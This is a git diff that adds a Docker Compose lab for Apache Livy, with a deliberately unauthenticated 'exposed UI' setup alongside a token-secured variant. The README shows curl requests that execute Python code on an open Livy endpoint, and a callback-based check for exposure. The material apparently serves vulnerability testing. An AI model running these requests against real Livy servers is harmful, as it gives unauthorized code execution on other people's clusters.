diff --git a/apache/livy/ExposedUI/README.md b/apache/livy/ExposedUI/README.md new file mode 100644 index 00000000..76a77fa8 --- /dev/null +++ b/apache/livy/ExposedUI/README.md @@ -0,0 +1,46 @@ +# Setup Apache Livy with Docker Compose + +## Vulnerable (Exposed UI — no authentication) +```bash +docker compose build spark-master +docker compose up +``` + +### Access the Livy UI and execute PySpark code +```bash +curl -X POST -H "Content-Type: application/json" -d '{"kind":"pyspark"}' http://localhost:8998/sessions +# {"id":6,"name":null,"appId":null,"owner":null,"proxyUser":null,"state":"starting",...} + +# replace id from last response with $id +curl -X POST -H "Content-Type: application/json" -d '{"code":"import os\nprint(os.getcwd())"}' http://localhost:8998/sessions/$id/statements +# wait ~30sec for session to become idle + +# replace id from last response with $statements_id +curl http://127.0.0.1:8998/sessions/$id/statements/$statements_id +# output.data is the stdout +``` +#### alternative approach +instead, you can send the callback address to `batches` endpoint to check if the Apache Hive instance is exposed +```bash +curl -X POST -H "Content-Type: application/json" -d '{"file":"callback_address"}' http://localhost:8998/batches +``` + +--- + +## Secured (Custom Authentication Filter) + +```bash +# Build and start the secured stack +docker compose -f docker-compose-secure.yml build +docker compose -f docker-compose-secure.yml up +``` + +### Test authentication +```bash +# Without token → 401 +curl -X POST -H "Content-Type: application/json" -d '{"kind":"pyspark"}' http://localhost:8998/sessions + +# With valid token → 200 +curl -X POST -H "Authorization: Bearer changeme-use-a-strong-secret" -H "Content-Type: application/json" -d '{"kind":"pyspark"}' http://localhost:8998/sessions + +``` diff --git a/apache/livy/ExposedUI/apache-livy/Dockerfile b/apache/livy/ExposedUI/apache-livy/Dockerfile new file mode 100644 index 00000000..c458ee0f --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/Dockerfile @@ -0,0 +1,16 @@ +#https://github.com/apache/incubator-livy?tab=readme-ov-file#building-livy +# Reuse the same image built for Spark Master/Worker +FROM mounirbs-local/spark-python3-java11:3.5.4 +USER root +ENV LIVY_HOME /opt/livy +WORKDIR /opt/ +# Get livy binaries from: https://livy.apache.org/download/ +RUN apt-get update && apt-get install -y unzip \ + && curl "https://dlcdn.apache.org/incubator/livy/0.8.0-incubating/apache-livy-0.8.0-incubating_2.12-bin.zip" -O \ + && unzip "apache-livy-0.8.0-incubating_2.12-bin" \ + && rm -rf "apache-livy-0.8.0-incubating_2.12-bin.zip" \ + && mv "apache-livy-0.8.0-incubating_2.12-bin" $LIVY_HOME \ + && mkdir $LIVY_HOME/logs \ + && chown -R spark:spark $LIVY_HOME + +USER spark diff --git a/apache/livy/ExposedUI/apache-livy/Dockerfile.secure b/apache/livy/ExposedUI/apache-livy/Dockerfile.secure new file mode 100644 index 00000000..66f4927f --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/Dockerfile.secure @@ -0,0 +1,27 @@ +# Reuse the same image built for Spark Master/Worker +FROM mounirbs-local/spark-python3-java11:3.5.4 +USER root +ENV LIVY_HOME /opt/livy +WORKDIR /opt/ + +# Install Livy +RUN apt-get update && apt-get install -y unzip \ + && curl "https://dlcdn.apache.org/incubator/livy/0.8.0-incubating/apache-livy-0.8.0-incubating_2.12-bin.zip" -O \ + && unzip "apache-livy-0.8.0-incubating_2.12-bin" \ + && rm -rf "apache-livy-0.8.0-incubating_2.12-bin.zip" \ + && mv "apache-livy-0.8.0-incubating_2.12-bin" $LIVY_HOME \ + && mkdir $LIVY_HOME/logs \ + && chown -R spark:spark $LIVY_HOME + +# Compile and install the custom authentication filter +COPY custom-auth/src /tmp/custom-auth-src +RUN mkdir -p /tmp/custom-auth-classes \ + && javac -cp "$LIVY_HOME/jars/*" \ + -d /tmp/custom-auth-classes \ + /tmp/custom-auth-src/com/livy/auth/TokenAuthFilter.java \ + && jar cf $LIVY_HOME/jars/livy-custom-auth.jar \ + -C /tmp/custom-auth-classes . \ + && rm -rf /tmp/custom-auth-src /tmp/custom-auth-classes \ + && chown spark:spark $LIVY_HOME/jars/livy-custom-auth.jar + +USER spark diff --git a/apache/livy/ExposedUI/apache-livy/conf/livy-client.conf b/apache/livy/ExposedUI/apache-livy/conf/livy-client.conf new file mode 100644 index 00000000..97147729 --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/livy-client.conf @@ -0,0 +1,108 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +# +# Configurations for a Livy Client, any configurations set here will override any +# livy or spark-default configurations. +# +# Before a Livy Client is able to load these configurations the folder containing +# this file must be added to the application classpath +# + +# +# Configurations for Livy HTTPClient +# + +# HTTP Request configurations +# How long before a request times out +# livy.client.http.connection.timeout = 10s +# How long between data packets before a request times out +# livy.client.http.connection.socket.timeout = 5m +# Whether content is compressed +# livy.client.http.content.compress.enable = true + +# How long before idle connections are closed +# livy.client.http.connection.idle.timeout = 10m + +# Initial interval before polling for Job results +# livy.client.http.job.initial-poll-interval = 100ms +# Maximum interval between successive polls +# livy.client.http.job.max-poll-interval = 5s + +# +# Configurations for Livy RSCClient +# + +# Configurations for registering a client with the rpc server +# Unique client id for connections to the rpc server +# livy.rsc.client.auth.id = +# Secret value for authenticating client connections with server +# livy.rsc.client.auth.secret = + +# Timeout when stopping a rsc client +# livy.rsc.client.shutdown-timeout = 10s + +# Class of the rsc driver to use +# livy.rsc.driver-class = +# The kind of rsc session. Examples: pyspark or sparkr +# livy.rsc.session.kind = + +# Comma-separated list of Livy RSC jars. By default Livy will upload jars from its installation +# directory every time a session is started. By caching these files in HDFS, for example, startup +# time of sessions on YARN can be reduced. +# livy.rsc.jars = +# Location of the SparkR package for running sparkr +# livy.rsc.sparkr.package = +# Location of the PySpark package for running pyspark +# livy.rsc.pyspark.archives = + +# Address for the RSC driver to connect back with it's connection info. +# livy.rsc.launcher.address = + +# Port Range on which RPC will launch . Port range in inclusive of start and end port . +livy.rsc.launcher.port.range = 10000~10010 + +# How long will the RSC wait for a connection for a Livy server before shutting itself down. +livy.rsc.server.idle-timeout = 10m + +# The user that should be impersonated when requesting a Livy session +# livy.rsc.proxy-user = + +# Host or IP adress of the rpc server + +#livy.rsc.rpc.server.address = livy-server +# How long the rsc client will wait when attempting to connect to the Livy server +#livy.rsc.server.connect.timeout = 90s + +# The logging level for the rpc channel. Possible values: TRACE, DEBUG, INFO, WARN, or ERROR +livy.rsc.channel.log.level = ERROR + +# SASL configurations for authentication +# SASL mechanism used for authentication +# livy.rsc.rpc.sasl.mechanisms = DIGEST-MD5 +# SASL qop used for authentication +# livy.rsc.rpc.sasl.qop = + +# Time between status checks for cancelled a Job +# livy.rsc.job-cancel.trigger-interval = 100ms +# Time before a cancelled a Job is forced into a Cancelled state +# livy.rsc.job-cancel.timeout = 30s + +# Number of statements kept in driver's memory +# livy.rsc.retained-statements = 100 +# +livy.rsc.jars = /opt/livy/rsc-jars/livy-api-0.8.0-incubating.jar, /opt/livy/rsc-jars/livy-rsc-0.8.0-incubating.jar diff --git a/apache/livy/ExposedUI/apache-livy/conf/livy-env.sh b/apache/livy/ExposedUI/apache-livy/conf/livy-env.sh new file mode 100644 index 00000000..04796887 --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/livy-env.sh @@ -0,0 +1,38 @@ +#!/usr/bin/env bash +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# LIVY ENVIRONMENT VARIABLES +# +# - JAVA_HOME Java runtime to use. By default use "java" from PATH. +# - HADOOP_CONF_DIR Directory containing the Hadoop / YARN configuration to use. +# - SPARK_HOME Spark which you would like to use in Livy. +# - SPARK_CONF_DIR Optional directory where the Spark configuration lives. +# (Default: $SPARK_HOME/conf) +# - LIVY_LOG_DIR Where log files are stored. (Default: ${LIVY_HOME}/logs) +# - LIVY_PID_DIR Where the pid file is stored. (Default: /tmp) +# - LIVY_SERVER_JAVA_OPTS Java Opts for running livy server (You can set jvm related setting here, +# like jvm memory/gc algorithm and etc.) +# - LIVY_IDENT_STRING A name that identifies the Livy server instance, used to generate log file +# names. (Default: name of the user starting Livy). +# - LIVY_MAX_LOG_FILES Max number of log file to keep in the log directory. (Default: 5.) +# - LIVY_NICENESS Niceness of the Livy server process when running in the background. (Default: 0.) +# - LIVY_CLASSPATH Override if the additional classpath is required. + +export JAVA_HOME=/opt/java/openjdk +export SPARK_HOME=/opt/spark +export LIVY_LOG_DIR=/opt/livy/logs +export SPARK_CONF_DIR=/opt/spark/conf \ No newline at end of file diff --git a/apache/livy/ExposedUI/apache-livy/conf/livy-secure.conf b/apache/livy/ExposedUI/apache-livy/conf/livy-secure.conf new file mode 100644 index 00000000..1eda2589 --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/livy-secure.conf @@ -0,0 +1,59 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +# What host address to start the server on. +livy.server.host = 0.0.0.0 + +# What port to start the server on. +livy.server.port = 8998 + +# What spark master Livy sessions should use. +livy.spark.master = spark://spark-master:7077 + +# What spark deploy mode Livy sessions should use. +livy.spark.deploy-mode = client + +# If livy should impersonate the requesting users when creating a new session. +livy.impersonation.enabled = true + +# List of local directories from where files are allowed to be added to user sessions. +livy.file.local-dir-whitelist = /target/ + +# If the Livy Web UI should be included in the Livy Server. +livy.ui.enabled = true + +# Enable CSRF protection +livy.server.csrf-protection.enabled = false + +# ============================================================ +# Custom Authentication Filter Configuration +# ============================================================ +# Use a custom token-based authentication filter. +# All requests must include: Authorization: Bearer +livy.server.auth.type = token +livy.server.auth.token.class = com.livy.auth.TokenAuthFilter +livy.server.auth.token.param.token = changeme-use-a-strong-secret + +# ============================================================ +# Access Control +# ============================================================ +livy.server.access-control.enabled = true +livy.server.access-control.allowed-users = livy-user + +livy.repl.jars = /opt/livy/jars/livy-client-common-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/livy-core_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/commons-codec-1.9.jar, /opt/livy/repl_2.12-jars/livy-core_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/minlog-1.3.0.jar, /opt/livy/repl_2.12-jars/kryo-shaded-4.0.2.jar, /opt/livy/repl_2.12-jars/livy-repl_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/objenesis-2.5.1.jar + +livy.rsc.jars = /opt/livy/rsc-jars/livy-api-0.8.0-incubating.jar, /opt/livy/rsc-jars/livy-rsc-0.8.0-incubating.jar diff --git a/apache/livy/ExposedUI/apache-livy/conf/livy.conf b/apache/livy/ExposedUI/apache-livy/conf/livy.conf new file mode 100644 index 00000000..4f289ef2 --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/livy.conf @@ -0,0 +1,198 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# Use this keystore for the SSL certificate and key. +# livy.keystore = + +# Specify the keystore password. +# livy.keystore.password = +# +# Specify the key password. +# livy.key-password = + +# Hadoop Credential Provider Path to get "livy.keystore.password" and "livy.key-password". +# Credential Provider can be created using command as follow: +# hadoop credential create "livy.keystore.password" -value "secret" -provider jceks://hdfs/path/to/livy.jceks +# livy.hadoop.security.credential.provider.path = + +# What host address to start the server on. By default, Livy will bind to all network interfaces. +livy.server.host = 0.0.0.0 + +# What port to start the server on. +livy.server.port = 8998 + +# What base path ui should work on. By default UI is mounted on "/". +# E.g.: livy.ui.basePath = /my_livy - result in mounting UI on /my_livy/ +# livy.ui.basePath = "" + +# What spark master Livy sessions should use. +livy.spark.master = spark://spark-master:7077 + +# What spark deploy mode Livy sessions should use. +livy.spark.deploy-mode = client + +# Configure Livy server http request and response header size. +# livy.server.request-header.size = 131072 +# livy.server.response-header.size = 131072 + +# Whether or not to send server version in http response. +# livy.server.send-server-version = false + +# Enabled to check whether timeout Livy sessions should be stopped. +#livy.server.session.timeout-check = true +# +# Whether or not to skip timeout check for a busy session +#livy.server.session.timeout-check.skip-busy = false + +# Time in milliseconds on how long Livy will wait before timing out an inactive session. +# Note that the inactive session could be busy running jobs. +#livy.server.session.timeout = 5m +# +# How long a finished session state should be kept in LivyServer for query. +#livy.server.session.state-retain.sec = 120s + +# If livy should impersonate the requesting users when creating a new session. +livy.impersonation.enabled = true + +# Logs size livy can cache for each session/batch. 0 means don't cache the logs. +# livy.cache-log.size = 200 + +# Comma-separated list of Livy RSC jars. By default Livy will upload jars from its installation +# directory every time a session is started. By caching these files in HDFS, for example, startup +# time of sessions on YARN can be reduced. +# livy.rsc.jars = + +# Comma-separated list of Livy REPL jars. By default Livy will upload jars from its installation +# directory every time a session is started. By caching these files in HDFS, for example, startup +# time of sessions on YARN can be reduced. Please list all the repl dependencies including +# Scala version-specific livy-repl jars, Livy will automatically pick the right dependencies +# during session creation. +# livy.repl.jars = + +# Location of PySpark archives. By default Livy will upload the file from SPARK_HOME, but +# by caching the file in HDFS, startup time of PySpark sessions on YARN can be reduced. +# livy.pyspark.archives = + +# Location of the SparkR package. By default Livy will upload the file from SPARK_HOME, but +# by caching the file in HDFS, startup time of R sessions on YARN can be reduced. +# livy.sparkr.package = + +# List of local directories from where files are allowed to be added to user sessions. By +# default it's empty, meaning users can only reference remote URIs when starting their +# sessions. +livy.file.local-dir-whitelist = /target/ + +# Whether to enable csrf protection, by default it is false. If it is enabled, client should add +# http-header "X-Requested-By" in request if the http method is POST/DELETE/PUT/PATCH. +# livy.server.csrf-protection.enabled = + +# Whether to enable HiveContext in livy interpreter, if it is true hive-site.xml will be detected +# on user request and then livy server classpath automatically. +# livy.repl.enable-hive-context = + +# Recovery mode of Livy. Possible values: +# off: Default. Turn off recovery. Every time Livy shuts down, it stops and forgets all sessions. +# recovery: Livy persists session info to the state store. When Livy restarts, it recovers +# previous sessions from the state store. +# Must set livy.server.recovery.state-store and livy.server.recovery.state-store.url to +# configure the state store. +# livy.server.recovery.mode = off +# Zookeeper address used for HA and state store. e.g. host1:port1, host2:port2 +# livy.server.zookeeper.url = + +# Where Livy should store state to for recovery. Possible values: +# : Default. State store disabled. +# filesystem: Store state on a file system. +# zookeeper: Store state in a Zookeeper instance. +# livy.server.recovery.state-store = + +# For filesystem state store, the path of the state store directory. Please don't use a filesystem +# that doesn't support atomic rename (e.g. S3). e.g. file:///tmp/livy or hdfs:///. +# For zookeeper, the address to the Zookeeper servers. e.g. host1:port1,host2:port2 +# If livy.server.recovery.state-store is zookeeper, this config is for back-compatibility, +# so if both this config and livy.server.zookeeper.url exist, +# livy uses livy.server.zookeeper.url first. +# livy.server.recovery.state-store.url = + +# The policy of curator connecting to zookeeper. +# For example, m, n means retry m times and the interval of retry is n milliseconds. +# Please use the new config: livy.server.zk.retry-policy. +# Keep this config for back-compatibility. +# If both this config and livy.server.zk.retry-policy exist, +# livy uses livy.server.zk.retry-policy first. +# livy.server.recovery.zk-state-store.retry-policy = 5,100 + +# The policy of curator connecting to zookeeper. +# For example, m, n means retry m times and the interval of retry is n milliseconds +# livy.server.zk.retry-policy = + +# The dir in zk to store the data about session. +# livy.server.recovery.zk-state-store.key-prefix = livy + +# If Livy can't find the yarn app within this time, consider it lost. +# livy.server.yarn.app-lookup-timeout = 120s +# When the cluster is busy, we may fail to launch yarn app in app-lookup-timeout, then it would +# cause session leakage, so we need to check session leakage. +# How long to check livy session leakage +# livy.server.yarn.app-leakage.check-timeout = 600s +# how often to check livy session leakage +# livy.server.yarn.app-leakage.check-interval = 60s + +# How often Livy polls YARN to refresh YARN app state. +# livy.server.yarn.poll-interval = 5s +# +# Days to keep Livy server request logs. +# livy.server.request-log-retain.days = 5 + +# If the Livy Web UI should be included in the Livy Server. Enabled by default. +livy.ui.enabled = true + +# Whether to enable Livy server access control, if it is true then all the income requests will +# be checked if the requested user has permission. +# livy.server.access-control.enabled = false + +# Allowed users to access Livy, by default any user is allowed to access Livy. If user want to +# limit who could access Livy, user should list all the permitted users with comma separated. +# livy.server.access-control.allowed-users = * + +# A list of users with comma separated has the permission to change other user's submitted +# session, like submitting statements, deleting session. +# livy.server.access-control.modify-users = + +# A list of users with comma separated has the permission to view other user's infomation, like +# submitted session state, statement results. +# livy.server.access-control.view-users = +# +# Authentication support for Livy server +# Livy has a built-in SPnego authentication support for HTTP requests with below configurations. +# livy.server.auth.type = kerberos +# livy.server.auth.kerberos.principal = +# livy.server.auth.kerberos.keytab = +# livy.server.auth.kerberos.name-rules = DEFAULT +# +# If user wants to use custom authentication filter, configurations are: +# livy.server.auth.type = +# livy.server.auth..class = +# livy.server.auth..param. = +# livy.server.auth..param. = + +# Enable to allow custom classpath by proxy user in cluster mode +# The below configuration parameter is disabled by default. +# livy.server.session.allow-custom-classpath = true + +livy.repl.jars = /opt/livy/jars/livy-client-common-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/livy-core_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/commons-codec-1.9.jar, /opt/livy/repl_2.12-jars/livy-core_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/minlog-1.3.0.jar, /opt/livy/repl_2.12-jars/kryo-shaded-4.0.2.jar, /opt/livy/repl_2.12-jars/livy-repl_2.12-0.8.0-incubating.jar, /opt/livy/repl_2.12-jars/objenesis-2.5.1.jar + +livy.rsc.jars = /opt/livy/rsc-jars/livy-api-0.8.0-incubating.jar, /opt/livy/rsc-jars/livy-rsc-0.8.0-incubating.jar diff --git a/apache/livy/ExposedUI/apache-livy/conf/log4j.properties b/apache/livy/ExposedUI/apache-livy/conf/log4j.properties new file mode 100644 index 00000000..70b67a6d --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/log4j.properties @@ -0,0 +1,24 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# The default Livy logging configuration. +log4j.rootCategory=INFO, console +log4j.appender.console=org.apache.log4j.ConsoleAppender +log4j.appender.console.target=System.err +log4j.appender.console.layout=org.apache.log4j.PatternLayout +log4j.appender.console.layout.ConversionPattern=%d{yy/MM/dd HH:mm:ss} %p %c{1}: %m%n + +log4j.logger.org.eclipse.jetty=WARN diff --git a/apache/livy/ExposedUI/apache-livy/conf/spark-blacklist b/apache/livy/ExposedUI/apache-livy/conf/spark-blacklist new file mode 100644 index 00000000..e371ed22 --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/conf/spark-blacklist @@ -0,0 +1,35 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# +# Configuration override / blacklist. Defines a list of properties that users are not allowed +# to override when starting Spark sessions. +# +# This file takes a list of property names (one per line). Empty lines and lines starting with "#" +# are ignored. +# + +# Disallow overriding the master and the deploy mode. +spark.master +spark.submit.deployMode + +# Disallow overriding the location of Spark cached jars. +spark.yarn.jar +spark.yarn.jars +spark.yarn.archive + +# Don't allow users to override the RSC timeout. +livy.rsc.server.idle-timeout diff --git a/apache/livy/ExposedUI/apache-livy/custom-auth/src/com/livy/auth/TokenAuthFilter.java b/apache/livy/ExposedUI/apache-livy/custom-auth/src/com/livy/auth/TokenAuthFilter.java new file mode 100644 index 00000000..5fc6c46d --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/custom-auth/src/com/livy/auth/TokenAuthFilter.java @@ -0,0 +1,83 @@ +package com.livy.auth; + +import javax.servlet.*; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import java.io.IOException; +import java.security.Principal; + +/** + * Custom authentication filter for Apache Livy. + * + * Validates requests using a static bearer token passed via the "Authorization" header. + * The expected token is configured through the Livy config property: + * livy.server.auth.token.param.token = <secret-value> + * + * Requests without a valid "Authorization: Bearer <token>" header receive a 401 response. + */ +public class TokenAuthFilter implements Filter { + + private String expectedToken; + + @Override + public void init(FilterConfig filterConfig) throws ServletException { + expectedToken = filterConfig.getInitParameter("token"); + if (expectedToken == null || expectedToken.isEmpty()) { + throw new ServletException( + "TokenAuthFilter requires 'token' init parameter. " + + "Set livy.server.auth.token.param.token in livy.conf"); + } + } + + @Override + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) + throws IOException, ServletException { + + HttpServletRequest httpReq = (HttpServletRequest) request; + HttpServletResponse httpResp = (HttpServletResponse) response; + + String authHeader = httpReq.getHeader("Authorization"); + + if (authHeader != null && authHeader.startsWith("Bearer ")) { + String token = authHeader.substring("Bearer ".length()).trim(); + if (token.equals(expectedToken)) { + // Wrap request so Livy sees an authenticated principal + HttpServletRequest wrappedRequest = new AuthenticatedRequestWrapper(httpReq, "livy-user"); + chain.doFilter(wrappedRequest, response); + return; + } + } + + httpResp.setStatus(HttpServletResponse.SC_UNAUTHORIZED); + httpResp.setContentType("application/json"); + httpResp.getWriter().write("{\"error\": \"Unauthorized. Provide a valid Authorization: Bearer header.\"}"); + } + + @Override + public void destroy() { + // no-op + } + + /** + * Wrapper that exposes the authenticated user as a Principal so Livy's + * access-control layer can identify the caller. + */ + private static class AuthenticatedRequestWrapper extends javax.servlet.http.HttpServletRequestWrapper { + private final String username; + + AuthenticatedRequestWrapper(HttpServletRequest request, String username) { + super(request); + this.username = username; + } + + @Override + public Principal getUserPrincipal() { + return () -> username; + } + + @Override + public String getRemoteUser() { + return username; + } + } +} diff --git a/apache/livy/ExposedUI/apache-livy/spark/conf/spark-defaults.conf b/apache/livy/ExposedUI/apache-livy/spark/conf/spark-defaults.conf new file mode 100644 index 00000000..25721bbf --- /dev/null +++ b/apache/livy/ExposedUI/apache-livy/spark/conf/spark-defaults.conf @@ -0,0 +1,35 @@ +# +# Licensed to the Apache Software Foundation (ASF) under one or more +# contributor license agreements. See the NOTICE file distributed with +# this work for additional information regarding copyright ownership. +# The ASF licenses this file to You under the Apache License, Version 2.0 +# (the "License"); you may not use this file except in compliance with +# the License. You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +# Default system properties included when running spark-submit. +# This is useful for setting default environmental settings. + +# Example: +spark.master spark://spark-master:7077 +spark.driver.host apache-livy +# spark.eventLog.enabled true +# spark.eventLog.dir hdfs://namenode:8021/directory +# spark.serializer org.apache.spark.serializer.KryoSerializer +# spark.driver.memory 2g +# spark.executor.extraJavaOptions -XX:+PrintGCDetails -Dkey=value -Dnumbers="one two three" + +# Dynamic Allocation +# Livy considers a dynamic executor one full worker (no concept of cores). So if a worker has 4 cores, one executor for Apache Livy will contain 4 cores +spark.dynamicAllocation.enabled true +spark.dynamicAllocation.minExecutors 1 +spark.dynamicAllocation.maxExecutors 4 +spark.dynamicAllocation.initialExecutors 1 diff --git a/apache/livy/ExposedUI/docker-compose-secure.yml b/apache/livy/ExposedUI/docker-compose-secure.yml new file mode 100644 index 00000000..d674750f --- /dev/null +++ b/apache/livy/ExposedUI/docker-compose-secure.yml @@ -0,0 +1,74 @@ +services: + spark-master: + container_name: spark-master + hostname: spark-master + build: + context: ./ + dockerfile: ./spark/Dockerfile + image: mounirbs-local/spark-python3-java11:3.5.4 + ports: + - "8080:8080" + - "7077:7077" + - "6066:6066" + environment: + - SPARK_MASTER_HOST=spark-master + - SPARK_MASTER_PORT=7077 + - SPARK_MASTER_WEBUI_PORT=8080 + - SPARK_DAEMON_MEMORY=2g + - SPARK_MASTER_OPTS=-Dspark.master.rest.enabled=true + - PYSPARK_PYTHON=python3 + entrypoint: + - "bash" + - "-c" + - "/opt/spark/sbin/start-master.sh && tail -f /dev/null" + volumes: + - ./python:/python + + spark-worker: + image: mounirbs-local/spark-python3-java11:3.5.4 + ports: + - "8081:8081" + container_name: spark-worker + hostname: spark-worker + environment: + - SPARK_WORKER_CORES=1 + - SPARK_WORKER_MEMORY=2g + - PYSPARK_PYTHON=python3 + depends_on: + - spark-master + entrypoint: + - "bash" + - "-c" + - "/opt/spark/sbin/start-worker.sh spark://spark-master:7077 && tail -f /dev/null" + volumes: + - ./python:/python + + apache-livy: + container_name: apache-livy + hostname: apache-livy + environment: + - PYSPARK_PYTHON=python3 + build: + context: ./apache-livy/ + dockerfile: Dockerfile.secure + image: mounirbs-local/livy-spark3.5.4-python3-java11:0.8-secure + command: ["sh", "-c", "/opt/livy/bin/livy-server"] + user: root + volumes: + # Mount the SECURE config that enables the custom auth filter + - ./apache-livy/conf/livy-secure.conf:/opt/livy/conf/livy.conf + - ./apache-livy/conf/livy-client.conf:/opt/livy/conf/livy-client.conf + - ./apache-livy/conf/livy-env.sh:/opt/livy/conf/livy-env.sh + - ./apache-livy/conf/log4j.properties:/opt/livy/conf/log4j.properties + - ./apache-livy/conf/spark-blacklist:/opt/livy/conf/spark-blacklist + - ./apache-livy/spark/conf/:/opt/spark/conf/ + ports: + - '8998:8998' + depends_on: + - spark-master + - spark-worker + deploy: + resources: + limits: + cpus: '1' + memory: 2g diff --git a/apache/livy/ExposedUI/docker-compose.yml b/apache/livy/ExposedUI/docker-compose.yml new file mode 100644 index 00000000..4075e544 --- /dev/null +++ b/apache/livy/ExposedUI/docker-compose.yml @@ -0,0 +1,73 @@ +services: + spark-master: + container_name: spark-master + hostname: spark-master + build: + context: ./ + dockerfile: ./spark/Dockerfile + image: mounirbs-local/spark-python3-java11:3.5.4 + ports: + - "8080:8080" + - "7077:7077" + - "6066:6066" + labels: + kompose.service.expose: true + kompose.service.type: headless + environment: + - SPARK_MASTER_HOST=spark-master + - SPARK_MASTER_PORT=7077 + - SPARK_MASTER_WEBUI_PORT=8080 + - SPARK_DAEMON_MEMORY=2g + - SPARK_MASTER_OPTS="-Dspark.master.rest.enabled=true" + - PYSPARK_PYTHON=python3 + entrypoint: + - "bash" + - "-c" + - "/opt/spark/sbin/start-master.sh && tail -f /dev/null" + + spark-worker: + # reuse the image built for the spark-master + image: mounirbs-local/spark-python3-java11:3.5.4 + ports: + - "8081:8081" + labels: + kompose.service.expose: true + kompose.service.type: headless + container_name: spark-worker + hostname: spark-worker + environment: + - SPARK_WORKER_CORES=1 + - SPARK_WORKER_MEMORY=2g + - PYSPARK_PYTHON=python3 + depends_on: + - spark-master + entrypoint: + - "bash" + - "-c" + - "/opt/spark/sbin/start-worker.sh spark://spark-master:7077 && tail -f /dev/null" + + apache-livy: + container_name: apache-livy + hostname: apache-livy + environment: + - PYSPARK_PYTHON=python3 + build: ./apache-livy/ + image: mounirbs-local/livy-spark3.5.4-python3-java11:0.8 + command: ["sh", "-c", "/opt/livy/bin/livy-server"] + user: root + volumes: + - ./apache-livy/conf/:/opt/livy/conf/ + - ./apache-livy/spark/conf/:/opt/spark/conf/ + ports: + - '8998:8998' + labels: + kompose.service.expose: true + kompose.service.type: headless + depends_on: + - spark-master + - spark-worker + deploy: + resources: + limits: + cpus: '1' + memory: 2g \ No newline at end of file diff --git a/apache/livy/ExposedUI/requirements.txt b/apache/livy/ExposedUI/requirements.txt new file mode 100644 index 00000000..d9350b29 --- /dev/null +++ b/apache/livy/ExposedUI/requirements.txt @@ -0,0 +1,4 @@ 